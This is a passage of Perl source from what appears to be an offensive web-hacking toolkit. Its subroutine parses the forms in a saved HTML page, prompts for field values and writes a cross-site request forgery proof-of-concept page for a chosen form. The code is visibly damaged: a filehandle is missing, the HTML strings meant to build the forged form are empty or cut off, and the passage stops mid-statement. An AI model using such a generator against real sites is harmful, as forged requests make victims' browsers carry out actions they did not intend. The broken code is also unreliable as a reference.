| sub csrf_scan { 2547 | 2548 | clean(); 2549 | head_csrf(); 2550 | 2551 | my $archivo_html = printear( "[+] File HTML : ", "stdin", "11", "13" ); 2552 | my $resultado = printear( "\n[+] SaveFile : ", "stdin", "11", "13" ); 2553 | 2554 | unless ( -f $archivo_html ) { 2555 | printear( "\n[-] File Not Found\n", "text", "5", "5" ); 2556 | adios(); 2557 | } 2558 | 2559 | printear( "\n[+] File to parse : " . $archivo_html . "\n", 2560 | "text", "13", "5" ); 2561 | 2562 | open( FILE, $archivo_html ); 2563 | my $words = join q(), ; 2564 | close(FILE); 2565 | 2566 | my @testar = HTML::Form->parse( $words, "/" ); 2567 | 2568 | $count = 0; 2569 | foreach my $test (@testar) { 2570 | $count++; 2571 | printear( "\n -- == Form $count == --\n\n", "text", "13", "5" ); 2572 | if ( $test->attr(name) eq "" ) { 2573 | printear( "[+] Name : No Found" . "\n", "text", "13", "5" ); 2574 | } 2575 | else { 2576 | printear( "[+] Name : " . $test->attr(name) . "\n", 2577 | "text", "13", "5" ); 2578 | } 2579 | printear( "[+] Action : " . $test->action . "\n", "text", "13", "5" ); 2580 | printear( "[+] Method : " . $test->method . "\n", "text", "13", "5" ); 2581 | printear( "\n-- == Input == --\n\n", "text", "13", "5" ); 2582 | @inputs = $test->inputs; 2583 | printear( "Type\t\tName\t\tValue\n", "text", "13", "5" ); 2584 | foreach $in (@inputs) { 2585 | printear( $in->type . "\t\t", "text", "13", "5" ); 2586 | printear( $in->name . "\t\t", "text", "13", "5" ); 2587 | printear( $in->value . "\t\t\n", "text", "13", "5" ); 2588 | } 2589 | } 2590 | 2591 | my $op = printear( "\n\n[+] Form to generate : ", "stdin", "11", "13" ); 2592 | 2593 | if ( $op ne "" ) { 2594 | $op--; 2595 | my $probar = ( HTML::Form->parse( $words, "/" ) )[$op]; 2596 | 2597 | my $action = ver( $words, $op ); 2598 | my $fin = nombre($action) . ".html"; 2599 | savefile( 2600 | "csrf/" . $resultado, 2601 | "
" 2602 | ); 2603 | @input = $probar->inputs; 2604 | foreach $in (@input) { 2605 | 2606 | my $val = printear( 2607 | "\n[+] Value of the " . $in->name . " : ", "stdin", 2608 | "11", "13" 2609 | ); 2610 | 2611 | savefile( 2612 | "csrf/" . $resultado, 2613 | "" 2614 | ); 2615 | } 2616 | my $final = 2617 | "